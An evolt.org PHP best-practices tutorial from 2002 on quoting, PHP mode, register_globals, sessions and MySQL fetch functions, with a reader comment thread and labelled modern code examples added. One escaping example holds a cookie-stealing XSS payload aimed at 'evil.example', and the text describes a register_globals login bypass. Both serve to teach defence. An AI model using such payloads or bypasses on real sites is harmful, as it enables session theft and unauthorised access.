PHP Guidelines

Jester uk

I see a lot of very badly written PHP code around, much of which I have been guilty of myself, so I thought I'd write a tutorial to help people get the most out of PHP, and maybe not make the mistakes I did.

" And ' Are Very Different

I see a lot of this:

$name = "Bill";

That is the wrong tool for the job. The whole point of double quotes is interpolation: PHP scans anything inside double quotes for variables (and for escape sequences such as \n and \t) and substitutes them. Like so:

echo "My name is $name";

If you write:

$name = "Bill";

PHP still scans the string for something to interpolate, even though there is nothing there. The extra work is real but tiny (the timing in the comments below found only fractions of a second over 10K assignments), so do not expect it to make a script noticeably faster. The better reasons to get into the habit of:

$name = 'Bill';

are that a single-quoted string says exactly what it means ("Hey, PHP, I'm not using double quotes, don't even bother checking for something to interpolate"), and that a literal $ or backslash in the text cannot be misread. A double-quoted "Total: $amount" interpolates $amount whether you meant it to or not; the single-quoted version stays literal. Only \' and \\ are special inside single quotes.

Get into the habit: double quotes when you want interpolation, single quotes when you want the text exactly as written.

These rules apply everywhere a string appears: echo, function arguments, array keys, everything.

SetCookie('name', 'Bill');

Not:

SetCookie("name", "Bill");

You can also keep single quotes when a variable is involved, and concatenate:

$name = 'Bill';
echo 'My name is ' . $name;

Any parse-speed gain from this is negligible; pick whichever of concatenation and interpolation reads better. Where single quotes really earn their keep is HTML, which is full of double quotes:

echo "<a href=\"http://www.evolt.org\">Evolt</a>";

Look familiar? Use single quotes and you don't have to escape the double quotes:

echo '<a href="http://www.evolt.org">Evolt</a>';

Works fine, and saves you having to escape those annoying quotes. (The reverse holds when the text itself is full of apostrophes: then double quotes save the escaping.)

Get used to it; I wish I'd been told that when I started with PHP.

Jump from PHP Mode

I also see a lot of this:

<?php
$name = 'Bill';
echo "<table align=\"center\"><tr><td>My name is $name</td></tr></table>";
?>

No, don't do that. One of the great features of PHP is its ability to jump in and out of PHP mode. Text outside the <?php ... ?> tags is sent to the browser as-is, so the parser never has to treat it as a string; whatever speed that gains is small, but the readability gain is large. Do this:

<?php
$name = 'Bill';
?>
<table align="center"><tr><td>My name is <?=$name?></td></tr></table>

Leave "PHP Mode" and print out the content; if you need more PHP code, just jump back in! It's easy to do, and it keeps the HTML readable as HTML.

<?=$name?>

This is a short-hand in PHP for:

<?php echo $name; ?>

Jump into PHP mode, echo the data contained in the variable, then jump back out of PHP mode. Two caveats. First, before PHP 5.4 the <?= form was only available when short_open_tag was on, so code that has to run on servers you do not control should use the long form. Second, and more important: echoing a variable straight into HTML is only safe if you know exactly what it contains. If $name came from a user, it can contain < or &, and a value such as <script>...</script> becomes script that runs in every visitor's browser (cross-site scripting). Pass anything that originated outside your script through htmlspecialchars() at the point where it goes into the HTML; the comments below discuss this further.
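The same template with the output escaped, as an added example that is not code from the original article. It assumes the value arrives in $_GET['name'] and falls back to a constructed hostile string so the file runs on its own; the helper e() is a name chosen here, not a PHP built-in. Requires PHP 7 or later.

```php
<?php
// Added example, not from the original article. Escapes request data on
// its way into HTML. Assumes $name comes from $_GET['name']; the fallback
// is a constructed hostile value so the script runs stand-alone (PHP 7+).

/**
 * Escape a value for HTML text or a quoted attribute. ENT_QUOTES covers
 * both " and ', so the result is safe inside either kind of attribute
 * quote; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
 */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$name = isset($_GET['name'])
    ? (string) $_GET['name']
    : '<script>document.location="http://evil.example/?c="+document.cookie</script>';

// Unsafe: the browser receives a live <script> element and runs it in the
// security context of this page.
//   echo "<td>My name is $name</td>";

// Safe: the browser receives &lt;script&gt;... and shows it as plain text.
?>
<table align="center"><tr><td>My name is <?= e($name) ?></td></tr></table>
<?php
// Attribute values need the same treatment, and the attribute must be quoted.
?>
<input type="text" name="name" value="<?= e($name) ?>">
```

Run it with php -S localhost:8080 and request /?name=%3Cb%3Ehi%3C/b%3E to see the markup arrive as text rather than as an element.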

register_globals Off

Another mistake I see a lot is people writing scripts that will not work if register_globals is off. From PHP 4.2.0 register_globals is off by default, so you need to start writing your scripts with this in mind.

Having register_globals off is no big deal. I mean, how hard is it to write:

$_POST['username']

Rather than:

$username

Not very. It's also a lot more secure, because it stops users passing variables into your script through the query string, a form field or a cookie. If they stuck:

?name=Jester

into their address bar, "Jester" would not be available in $name. It would be available in $_GET['name'] or $HTTP_GET_VARS['name'], and nowhere else. So they can't inject variables that twist the behaviour of your scripts. The classic failure is a flag you only ever set on success, such as $authorized = true after a password check: with register_globals on, a request carrying ?authorized=1 creates that variable for you before your code runs, and the check is bypassed. With register_globals off, input only arrives where you explicitly ask for it; and whatever the setting, initialise every variable before you test it.

Note: the $HTTP_SERVER_VARS, $HTTP_COOKIE_VARS, $HTTP_POST_VARS and $HTTP_GET_VARS arrays depend on track_vars, which is always on from PHP 4.0.3. Their newer equivalents $_SERVER, $_COOKIE, $_POST and $_GET (and $_SESSION) exist from PHP 4.1.0 and are superglobals, so they are visible inside functions without a global declaration, which the older arrays are not. Using these arrays instead of bare variables isn't much extra work for a lot more security.

Sessions are also simpler with register_globals off. Take a look at a snippet of code.

$username = $_POST['uname'];
session_register('username');

To register a session variable many people use this method (I have in the past). You don't need to; use the $_SESSION array:

$_SESSION['username'] = $_POST['uname'];

In the first version PHP has to be told that the variable is a session variable. In the second we store it in $_SESSION, and PHP knows anything in that array is session data; nothing needs "registering". Don't mix the two styles: the manual says that with register_globals off only $_SESSION should be used, and session_register() was removed entirely in PHP 5.4. The value is now available on every later request, without you having to pass it through the query string or form inputs, until you remove it, like so:

unset($_SESSION['username']);

That drops the one variable. To throw away the whole session, call session_destroy().
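The register_globals hole and the $_POST / $_SESSION style that closes it, together in one added example that is not part of the original article. check_password() and its single user are constructed here for illustration; a real application would verify against hashes stored in its user table. Requires PHP 7 or later.

```php
<?php
// Added example, not from the original article. Shows the hole
// register_globals opens and the $_POST / $_SESSION style that closes it.
// check_password() and its one user are constructed for illustration (PHP 7+).
session_start();

function check_password(string $user, string $pass): bool
{
    // Constructed user store. In a real application the hash is created once
    // with password_hash() and kept in the database.
    static $users = null;
    if ($users === null) {
        $users = ['bill' => password_hash('correct horse', PASSWORD_DEFAULT)];
    }
    return isset($users[$user]) && password_verify($pass, $users[$user]);
}

// --- What goes wrong with register_globals = On -------------------------
// $authorized is only assigned on success and never initialised, so a
// request for login.php?authorized=1 creates it (as "1") before this code
// runs, and the second test passes without any password:
//
//   if (check_password($username, $password)) {
//       $authorized = true;
//   }
//   if ($authorized) { show_admin_page(); }

// --- The same logic written for register_globals = Off ------------------
$authorized = false;                              // initialise before testing
$username = isset($_POST['uname']) ? (string) $_POST['uname'] : '';
$password = isset($_POST['pass'])  ? (string) $_POST['pass']  : '';

if ($username !== '' && check_password($username, $password)) {
    // No session_register(): assigning to $_SESSION is the registration.
    $_SESSION['username'] = $username;
    $authorized = true;
}
if ($authorized) {
    echo "Login OK\n";
}

// Any later request: the value is there without being passed in the URL
// or a hidden form field.
if (isset($_SESSION['username'])) {
    echo 'Logged in as ', htmlspecialchars($_SESSION['username'], ENT_QUOTES, 'UTF-8'), "\n";
}

// Logout: drop the one variable, or session_destroy() for the whole session.
if (isset($_POST['logout'])) {
    unset($_SESSION['username']);
}
```

The point of the explicit $authorized = false is that it makes the script correct under either setting; relying on register_globals being off is still relying on server configuration.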

With MySQL

Another mistake a lot of people make is in how they fetch data from a database. Anyone who has used PHP with MySQL will know the following function:

mysql_fetch_array()

"mysql_fetch_array() is an extended version of mysql_fetch_row(). In addition to storing the data in the numeric indices of the result array, it also stores the data in associative indices, using the field names as keys."

The above is taken from the function description on php.net. So when we use mysql_fetch_array() we get every column twice in one array: once under a numeric index, and once under the field name. Why? If you want numeric indices you use mysql_fetch_row(), right? We use mysql_fetch_array() when we want the field names, which is a lot easier to read, yet we carry a spare copy of every value along for the ride. Luckily those nice people at PHP have a function that fetches an associative array, and only that:

mysql_fetch_assoc()

mysql_fetch_assoc() fetches an associative array. If you want only that, use this function; if you want numeric indices, use mysql_fetch_row(); if for some reason you need both, then use mysql_fetch_array(). Don't build data you won't use. One caveat for anyone reading this today: the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7.0. The same three choices survive as mysqli_fetch_row(), mysqli_fetch_assoc() and mysqli_fetch_array() in mysqli, and as the PDO::FETCH_NUM, PDO::FETCH_ASSOC and PDO::FETCH_BOTH fetch styles in PDO (whose default, like mysql_fetch_array(), is FETCH_BOTH).
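Since the mysql_* functions no longer exist, this added example (not the article's code) shows the three fetch modes through PDO against an in-memory SQLite database, so it runs without a MySQL server; the table and rows are constructed for the demonstration. mysqli offers the same three modes under the mysqli_fetch_row/assoc/array names. Requires PHP 7 with pdo_sqlite.

```php
<?php
// Added example, not from the original article. ext/mysql is gone from
// modern PHP, so this uses PDO with an in-memory SQLite database (no server
// needed). The three fetch modes correspond one-to-one to
// mysql_fetch_row(), mysql_fetch_assoc() and mysql_fetch_array().
// Table and rows are constructed for the demonstration (PHP 7+, pdo_sqlite).

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, email TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (name, email) VALUES (?, ?)');
$ins->execute(['Bill', 'bill@example.com']);
$ins->execute(['Jester <jester@example.com>', 'jester@example.com']);

$sql = 'SELECT id, name, email FROM users ORDER BY id';

// FETCH_NUM   == mysql_fetch_row():   keys 0, 1, 2           (3 elements)
// FETCH_ASSOC == mysql_fetch_assoc(): keys id, name, email   (3 elements)
// FETCH_BOTH  == mysql_fetch_array(): both sets of keys      (6 elements)
$modes = [
    'FETCH_NUM'   => PDO::FETCH_NUM,
    'FETCH_ASSOC' => PDO::FETCH_ASSOC,
    'FETCH_BOTH'  => PDO::FETCH_BOTH,
];
foreach ($modes as $label => $mode) {
    $row = $db->query($sql)->fetch($mode);
    printf("%-11s %d elements, keys: %s\n", $label, count($row), implode(', ', array_keys($row)));
}

// The everyday loop: associative keys only, and each value escaped on its
// way into the HTML (the second row shows why that matters).
$stmt = $db->query($sql);
while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
    echo '<tr><td>', htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8'),
         '</td><td>', htmlspecialchars($row['email'], ENT_QUOTES, 'UTF-8'), "</td></tr>\n";
}
```

Run it with php fetch_modes.php; the first three lines print the element counts 3, 3 and 6, which is the doubled array the section describes.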

References

PHP is going places, it's a great language, in my opinion second-to-none when it comes to dynamic webpages. Let's use it to its full potential.

-Jester

I just like messing around with web design stuff, just a hobby.

Particularly perl, PHP and SQL.

http://www.free2code.net/

great article

Submitted by Martin Tsachev on May 13, 2002 - 15:22.

It's a great article particularly the register_globals = off that's something more people should get used to.

I wouldn't put <?=$name?> in an article like this though because short tags aren't portable. And I would also recommend the mysql_fetch_object function - it is easier if you need to output many variables and you opt for variables interpolation after all. You don't need to change anything when your variable is included in a string vs remove the quotes from the array index.

Good point

Submitted by jesteruk on May 13, 2002 - 19:04.

That's true Shaggy, the <?=$var?> shortcut won't work if you don't have short tags enabled, I'm so used to typing it though, I don't use XML so have no need to disable short tags, unless I'm writing something I need to be portable.

Interesting...

Submitted by Corsair on May 14, 2002 - 03:00.

I never had the fact that single and double quotes meant different things. Or maybe I just skimmed that chapter...Being a Computer Science major I just try and get the rundown on how stuff is done instead of having to read all the details. But here's a good reason why it's a smart idea to read between the lines. Good stuff that needed to be pointed out.

The other thing that I want to point out is this: USE BRACKETS! AND PROPERLY EVEN!.

I see a lot of code, even in the books I tried to learn the language from, that used the "as long as I only have one line of code after the statement I won't use brackets" rule. This is extremely bad coding practice... that, and indentation, and commenting. If everyone would do that it'd make for better code, for yourself and others.

Yes

Submitted by jesteruk on May 14, 2002 - 03:59.

Very good points Corsair, you mean like this?

if($blah) $blah = 'yes';
else $blah = 'no';

I have never and will never use that, is it so hard to type two brackets? I read somewhere the standard indent for coding is supposed to be "four spaces", but I disagree, why use four spaces when a tab makes a more apparent indent, and only uses one char? Using four spaces, eight for two indents, and so on, makes more complicated scripts significantly larger.

On the double quotes VS apostrophes, in theory double quotes take longer to process, as PHP has to evaluate the contents, with single quotes it doesn't. I have tested this a few different ways and single quotes are in fact a little faster, from my experiments. I wrote a little script that assigned 10K values to an array $var['x'] and contained the string I was assigning to it in double quotes, then in single quotes. The single quotes had a little on the double quotes, but even at 10K assignments it was only fractions of a second. It's nice to get rid of those fractions of a second though :)

Also

Submitted by luminosity on May 14, 2002 - 05:28.

Also, $_COOKIES is an array for cookie values, something you didn't mention. The great thing about these arrays is that since they're all global you don't have to worry about function scope at all.

a couple of extra tips

Submitted by skunk on May 14, 2002 - 10:59.

If you're really keen on efficiency try comparing these two lines of code:
echo 'Hello '.$name.', how are you doing?';
echo 'Hello ', $name, ', how are you doing?';

The second one should be faster. Why? Because in the first line the . operator is used to concatenate strings. This forces PHP to create a new string in memory to hold the newly created longer string, then send that new string to the output buffer. The second line uses commas instead - a little known feature of the echo statement (and one that differentiates it from print) is that you can give echo a comma separated list of values and it will output them one by one. The second line therefore avoids the overhead of creating a new concatenated string in memory.

A related tip on string concatenation is that PHP supports heredoc syntax (borrowed from perl). The following code demonstrates this:

$string =  
  

Deeper thinking

Submitted by tupholme on May 15, 2002 - 08:00.

Good points. I knew about the differences between quotation marks, but had never thought of the performance implications. PHP/Zend has so many ways of doing things it is easy to think that they are all equivalent. What about mentioning the difference between = and =& when creating objects? That is also non-obvious and makes the difference between keeping two copies of an object in memory and only one. (Or see the PHP manual!)

some thoughts

Submitted by Martin Tsachev on May 15, 2002 - 13:36.

Jester: Although I try to avoid the no-bracket ifs sometimes the code is clearer if you use them. Imagine 5 or 6 ifs running, of course if I use the else clause I would put brackets.

I read somewhere the standard indent for coding is supposed to be "four spaces", but I disagree, why use four spaces when a tab makes a more apparent indent, and only uses one char? Using four spaces, eight for two indents, and so on, makes more complicated scripts significantly larger.

There's a good reason for that and it is that using spaces is more portable than using tabs, the tabs aren't always displayed with the same size. The classic tab is equal to 8 characters and the modern one to 4 only, that makes a great difference. On the code size issue you really shouldn't worry about that - hard disks are so cheap these days and the PHP engine doesn't evaluate spaces so generally you can't expect a performance hit.

luminosity: Yes $_COOKIES is a global one but unfortunately it is available only from PHP 4.1 on, the old $HTTP_COOKIE_VARS wasn't a global. Anyway with recent security advisories most hosting services should have at least PHP 4.1.2.

skunk: Haven't you heard that < has to be escaped in HTML code, or you just thought that because it is displayed in a textarea you can save yourself the effort. The same comments though are displayed in a pre element when you choose 'Print article'.

Yes

Submitted by jesteruk on May 15, 2002 - 14:24.

Shaggy: I am aware tabs aren't portable, and differ in size from user to user, but my point is: A tab, whether it be 4 or 8 spaces, is always significant enough an indent to allow good coding structure. I'm aware hard drives are cheap, and PHP doesn't evaluate spaces, but bandwidth isn't cheap :) Why have a MB of spaces in a large project when you can reduce that four-fold? We should try to keep script as small as possible, using excess space is illogical.

I don't agree on the if() brackets, but that is your choice man.

-J

Spaces mean nothing, readability means everything

Submitted by eli on May 15, 2002 - 14:43.

I just created a file with 1000 lines of code, copied that and added 1000 spaces, copied that and added 1000 tabs.
The file started at 25k
The file with 1000 spaces was still 25k
The file with 1000 spaces and 1000 tabs was still......25k

PHP ignores whitespace and adding whitespace to a file does not appear to make it larger, so what matters here is coding style. The reason old-schoolers use spaces is because of a.) that is how they were taught and, 2.) there were some limitations on equipment that made using space(s) much easier. All that and tabs may be different from machine to machine.

The bottom line is that code must be readable, commented, and documented. If you write a piece of code today and do not do any of that, will you be able to maintain your code easily?

about tabs

Submitted by Martin Tsachev on May 15, 2002 - 14:48.

My point was that a user who views tabs as 4 characters may not realize that somebody else viewing the code with tabsize of 8 characters will have to scroll a lot. Anyway I use tabs and only convert them to spaces sometimes for display in articles. For minimization of scrollbars I've even sometimes converted them to 3 spaces.

Jester I didn't say I always use non-bracketed ifs but that I sometimes use them when there's no else clause and when there is a group of consecutive ifs. I don't know what can be wrong with that, it's just more compact and readable.

okay then...

Submitted by jesteruk on May 15, 2002 - 15:51.

"just created a file with 1000 lines of code, copied that and added 1000 spaces, copied that and added 1000 tabs. The file with 1000 spaces was still 25k
The file with 1000 spaces and 1000 tabs was still......25k
"

Really? So you are saying if you create a text file, hit the space bar 100 times and then save it, the file will be zero bytes? Interesting.

I'm aware that editors handle tabs inconsistently, and all editors handle spaces correctly, but for indents I'm sure it will have the desired effect, whatever editor or tab size one is using.

My point is simply: one tab takes up one byte, four spaces takes up four bytes.

We are all different ;) I prefer to use tabs, but... whatever floats your boat.

MySQL associative array!

Submitted by cbird on May 16, 2002 - 04:12.

I would just say that optimizing the code is always there! All we need to do is design the application before we start coding, and yes, the MySQL array tip was really memory refreshing!

inefficient

Submitted by a_baked_potato on May 16, 2002 - 18:19.

Optimizing code is all very good and well, but the performance difference between interpolated and static strings on modern hardware is minute. As is the performance difference between concatenating and then printing and giving echo multiple parameters. If you spend your own time doing this kind of stuff that's all fine and well. If you're spending your employer's time doing it then you are acting in an unprofessional manner.

The real gain (if any) comes from improved code readability, which should lead to easier maintenance. Significant performance improvements (the kind your boss wants you to spend the time he's paying you for to achieve, the kind that will actually make a difference) come almost exclusively from design level work. The classic computer science example is replacing bubble sort O(n^2) with merge or quick sorts O(n log n).

The tip about turning off register variables is excellent. This is exactly the sort of thing that promotes good design. Global variables are dangerous as they tend to tempt people into writing sloppy and poorly designed code.

The tip about switching in and out of php mode is suitable for small or trivial projects where performance isn't probably an issue anyway. Any serious php developer will tell you that a php page starts with <?php and ends with ?>. But then serious web developers tend to prefer more effective tools (zope for instance).

P.S. Anyone who deploys MySQL professionally should be shot. If you need a database then use a database, not a filesystem dressed up as a database. Acceptable alternatives abound.

Indeed

Submitted by jesteruk on May 16, 2002 - 19:46.

Thanks for the comments on register_globals, as for the rest, they're your opinions man :) Thanks for commenting.

-J

in and out of PHP mode

Submitted by Martin Tsachev on May 17, 2002 - 08:24.

Switching in and out of PHP mode gives you the most benefits in terms of readability. If you have used Zope then you won't even notice any performance hit this may cause.

Yes, go and shoot Yahoo!. If performance is on your mind why should you slow down the slowest part of the system by using another database?

Security

Submitted by Xanadu on May 17, 2002 - 09:24.

AFAIK,

<?php
..
?>
is more secure than <? .. ?>. I'm sure I read that we are encouraged to use the former always.

Superb tip about not needing to escape double quotes in echoed HTML!

Security

Submitted by Xanadu on May 17, 2002 - 09:25.

AFAIK, php at the start of your code is more secure than just a question mark. I'm sure I read that we are encouraged to use that always.

Superb tip about not needing to escape double quotes in echoed HTML!

Yes Shaggy.

Submitted by jesteruk on May 17, 2002 - 10:35.

MySQL is the most popular open-source database around, I think what a_baked_potato was trying to say was that he doesn't like it personally. He just came across as obnoxious, but some people do.

We must respect other people's opinions, if he doesn't like it; that is okay. Though he should respect those who do and try to refrain from blowing them away :) I detest fish, but I don't expect everyone else to.

-J

he doesn't like it personally?

Submitted by Martin Tsachev on May 17, 2002 - 12:58.

I'm not quite sure if I don't like an app personally I won't shoot and won't promote shooting people who use it, especially if Yahoo! are amongst the users of the app. We all know which is the most popular web site right?

Xanadu using <?php is surely more portable and is the only choice if you mix PHP with XML. Besides not all users are bound to setting short_open_tags.

True

Submitted by jesteruk on May 18, 2002 - 08:06.

Using <?php is just for portability, not everyone has short_open_tags on. If you are writing a script just for your site though, portability isn't an issue, you know your server config, your database, you can write specifically for those. It's if you're writing code other people will see, then you have to do it right. Also, one day you could have to move your scripts to a different server, or you may want to change the database you use, with that in mind it is always better to write portable code.

I agree shaggy, MySQL is a nice database, even if it is a "file system dressed up as a database". I like it, I understand others don't though.

Another escaping problem

Submitted by bobince on May 18, 2002 - 10:11.

Do this:

My name is <?=$name?>

No, don't do that. How do you know there isn't a '<' (or '&') character in $name? You've just made a cross-site-scripting security hole.

There is htmlspecialchars(). Use it every time you take plain-text content and move it into an HTML document. Or you'll get in trouble.

Anyone who deploys MySQL professionally should be shot.

Enough of this hoary old myth. Not every project needs transactions and foreign key constraints, in fact the majority of web projects don't. In any case, newer versions of MySQL are indeed growing them.

For some applications, MySQL does offer considerably more performance than the free alternatives. For other applications you may want the additional features provided by other databases. Both have their place; to argue MySQL has no place at all is silly.

Especially for people on Windows servers, for whom PostgreSQL is not an option.

1000 character 25k post

Submitted by mgkimsal on May 18, 2002 - 12:56.

The point wouldn't be to put 1000 spaces in one file and 1000 tabs in another. Put 4000 spaces in one file and 1000 tabs in another. Or 8000 spaces in the first file - that's the difference. If you're really concerned about offending someone else who might open your code file at some point, run a short program to replace the tabs with 4 or 8 spaces. Personally I hate having the editor say 'tab=4 spaces' because when I delete, it deletes one at a time, not 4 at a time (or 1 tab, which is what I want in the first place).

hmmmmmm

Submitted by jesteruk on May 18, 2002 - 20:40.

bobince explain: "No, don't do that. How do you know there isn't a '<' (or '&') character in $name? You've just made a cross-site-scripting security hole."

A cross-site-scripting security hole? I can see how a & or < could cause a validation error in the resulting document, but how does it form a security hole? Elaborate, I see no security risk, tell me if I'm missing something.

XSS

Submitted by bobince on May 19, 2002 - 11:44.

juk: if you can insert a '<', you can insert a '<script>', or any of the other ways of injecting JavaScript code into an HTML document.

If a user can submit a $name that others will see, they can execute code on other people's browsers in the security context of your page, which means they can do things like steal cookies, or defeat whatever other guards you have used against XSS.

For example, if your site requires a dynamically-generated 'form ID' to submit a form, which would normally prevent people crafting a malicious action that would make a user automatically take an action on your site, an injected script could, for example, load a page into an iframe, read the ID and submit it.

Ah

Submitted by jesteruk on May 20, 2002 - 14:24.

I see, well I always use regex to strip HTML out of variables, but it is a good point you make.

why regex?

Submitted by Martin Tsachev on May 21, 2002 - 12:43.

Why use regular expressions when we PHP users have the strip_tags function, or if you want to show angles and ampersands use htmlspecialchars.

because

Submitted by jesteruk on May 24, 2002 - 17:16.

sometimes I want certain tags to be allowed, so I just filter out anything that isn't one of those tags. I only see regex as a way to do this.

strip_tags

Submitted by Martin Tsachev on May 31, 2002 - 06:08.

strip_tags can do that too, although I'm not sure if it checks attributes.

No...

Submitted by jesteruk on June 1, 2002 - 13:04.

I don't think it does shaggy, you can specify tags you don't want to strip out, but not attributes. I have always used regex for that, I doubt there's a huge performance difference between the two.

hm

Submitted by Martin Tsachev on June 2, 2002 - 14:35.

Actually when I think about it now, I would do the same thing if I wanted to be 100% sure what will go through. Anyway if it's just to strip all tags the PHP function is much clearer than a regex.

variable content

Submitted by shotgun on September 13, 2002 - 08:31.

I find it very convenient to sporadically use print_r() to view variable content in different parts of my code. However, I sometimes forget to precede it with print '<pre>' and follow it with print '</pre>' so that the indentation print_r introduces displays correctly in the browser. I created the function print_vars() to handle such needs:

function print_vars($var){
	print '<pre>';
	print_r($var);
	print '</pre>';
	return;
}

With this, you only need to specify print_vars($variable) to view the contents of $variable

spaces vs tabs episode 2000

Submitted by bruco80 on March 20, 2006 - 14:16.

I prefer spaces, ok, but I think that 4 are too much!! It is very uncomfortable having very long lines, try it! With an if-block inside a loop you start coding in the middle of the screen!

PS
the best are 2 ;-)

Evolt.org is an all-volunteer resource for web developers made up of a discussion list, a browser archive, and member-submitted articles. This article is the property of its author, please do not redistribute or use elsewhere without checking with the author.